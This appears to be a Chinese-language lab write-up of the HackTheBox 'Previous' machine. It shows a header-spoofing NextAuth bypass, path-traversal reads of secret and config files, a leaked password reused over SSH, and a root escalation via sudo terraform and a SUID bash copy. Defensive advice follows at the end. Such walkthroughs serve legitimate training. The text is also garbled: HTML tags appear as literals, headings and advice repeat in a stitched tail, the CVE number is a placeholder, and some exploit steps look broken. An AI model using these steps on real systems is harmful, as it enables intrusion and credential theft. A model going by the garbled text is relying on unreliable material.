HTB靶场-Previous靶机渗透测试详细教学文档<\/h1>

1. 信息收集阶段<\/h2>

1.1 初始扫描<\/h3>

使用nmap进行基本端口扫描：<\/p>

nmap -sC -sV -oA initial_scan 10.10.11.xx
<\/code><\/pre>
扫描结果显示：<\/p>

开放端口：80(HTTP)和22(SSH)<\/li>
80端口访问后重定向到previous.htb域名<\/li>
<\/ul>
1.2 域名处理<\/h3>
将域名添加到hosts文件：<\/p>
echo "10.10.11.xx previous.htb" | sudo tee -a \/etc\/hosts
<\/code><\/pre>
1.3 网站初步分析<\/h3>
访问http:\/\/previous.htb发现：<\/p>

左下角泄露邮箱：jeremy@previous.htb<\/li>
存在登录接口：\/signin<\/li>
JS文件中发现多个API接口，但访问需要认证<\/li>
<\/ol>
2. 漏洞发现与利用<\/h2>
2.1 框架识别<\/h3>
通过不存在的URI报错信息发现使用NextAuth框架<\/p>
2.2 NextAuth认证绕过(CVE-2022-xxxx)<\/h3>
利用步骤：<\/p>

修改请求头：<\/li>
<\/ol>
GET \/docs HTTP\/1.1
Host: previous.htb
X-Forwarded-Host: previous.htb
X-Forwarded-Prefix: \/docs
<\/code><\/pre>

成功访问受保护文档页面<\/li>
<\/ol>
2.3 任意文件读取<\/h3>
通过\/docs\/example中的下载API发现文件读取功能<\/p>
2.3.1 关键文件读取<\/h4>

读取secret文件：<\/li>
<\/ol>
GET \/api\/download?file=\/app\/.env.local
<\/code><\/pre>
获取到加密密钥：<\/p>
NEXTAUTH_SECRET=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
<\/code><\/pre>

读取package.json：<\/li>
<\/ol>
GET \/api\/download?file=\/app\/package.json
<\/code><\/pre>
分析依赖组件寻找漏洞<\/p>

读取框架配置文件：<\/li>
<\/ol>
GET \/api\/download?file=\/app\/src\/pages\/_app.js
<\/code><\/pre>

发现硬编码凭证：<\/li>
<\/ol>
GET \/api\/download?file=\/app\/src\/lib\/config.js
<\/code><\/pre>
获取到数据库凭证：<\/p>
DB_USER=node
DB_PASS=I-l1k3-n0d3
<\/code><\/pre>
3. 初始访问<\/h2>
3.1 SSH登录尝试<\/h3>

尝试node用户：<\/li>
<\/ol>
ssh node@previous.htb
<\/code><\/pre>
密码：I-l1k3-n0d3 (失败)<\/p>

尝试jeremy用户：<\/li>
<\/ol>
ssh jeremy@previous.htb
<\/code><\/pre>
密码：I-l1k3-n0d3 (成功)<\/p>
4. 权限提升<\/h2>
4.1 环境分析<\/h3>

检查sudo权限：<\/li>
<\/ol>
sudo -l
<\/code><\/pre>
输出：<\/p>
User jeremy may run the following commands on previous:
    (root) SETENV: \/usr\/bin\/terraform apply *
<\/code><\/pre>
4.2 环境变量提权<\/h3>
利用步骤：<\/p>

创建恶意脚本：<\/li>
<\/ol>
echo 'cp \/bin\/bash \/tmp\/rootbash; chmod +xs \/tmp\/rootbash'<\/span> > \/tmp\/exploit.sh
<\/span><\/span>chmod +x \/tmp\/exploit.sh
<\/span><\/span><\/code><\/pre>
设置PATH环境变量：<\/li>
<\/ol>
export PATH=\/tmp:$PATH
<\/code><\/pre>

创建terraform配置文件：<\/li>
<\/ol>
# exploit.tf
<\/span><\/span><\/span><\/span>resource<\/span> "null_resource" "example"<\/span> {
<\/span><\/span>  provisioner<\/span> "local-exec"<\/span> {
<\/span><\/span>    command =<\/span> "exploit.sh"<\/span>
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
执行terraform利用：<\/li>
<\/ol>
sudo \/usr\/bin\/terraform apply exploit.tf
<\/code><\/pre>

获取root shell：<\/li>
<\/ol>
\/tmp\/rootbash -p
<\/code><\/pre>
5. 总结与关键点<\/h2>
渗透路径总结<\/h3>

信息收集：发现NextAuth框架使用<\/li>
认证绕过：利用CVE绕过NextAuth认证<\/li>
任意文件读取：通过API读取敏感配置文件<\/li>
凭证泄露：发现硬编码数据库密码<\/li>
SSH登录：使用泄露密码登录jeremy账户<\/li>
权限提升：利用terraform的SETENV权限进行提权<\/li>
<\/ol>
关键学习点<\/h3>

NextAuth框架的安全配置问题<\/li>
任意文件读取漏洞的利用方法<\/li>
硬编码凭证的风险<\/li>
SETENV在sudo权限中的危险性<\/li>
Terraform命令的环境变量继承特性<\/li>
<\/ol>
防御建议<\/h3>

及时更新框架和依赖组件<\/li>
避免在代码中硬编码敏感信息<\/li>
严格控制sudo权限，特别是SETENV选项<\/li>
对文件读取API实施严格的访问控制<\/li>
使用最小权限原则配置服务账户<\/li>
<\/ol>

HTB靶场-Previous靶机渗透测试详细教学文档<\/h1>

1. 信息收集阶段<\/h2>

2. 漏洞发现与利用<\/h2>

2.1 框架识别<\/h3> 通过不存在的URI报错信息发现使用NextAuth框架<\/p>

2.3 任意文件读取<\/h3> 通过\/docs\/example中的下载API发现文件读取功能<\/p>

3. 初始访问<\/h2>

4. 权限提升<\/h2>

5. 总结与关键点<\/h2>

防御建议<\/h3> 及时更新框架和依赖组件<\/li> 避免在代码中硬编码敏感信息<\/li> 严格控制sudo权限，特别是SETENV选项<\/li> 对文件读取API实施严格的访问控制<\/li> 使用最小权限原则配置服务账户<\/li> <\/ol>

2.1 框架识别<\/h3>
通过不存在的URI报错信息发现使用NextAuth框架<\/p>

2.3 任意文件读取<\/h3>
通过\/docs\/example中的下载API发现文件读取功能<\/p>

防御建议<\/h3>

及时更新框架和依赖组件<\/li>
避免在代码中硬编码敏感信息<\/li>
严格控制sudo权限，特别是SETENV选项<\/li>
对文件读取API实施严格的访问控制<\/li>
使用最小权限原则配置服务账户<\/li> <\/ol>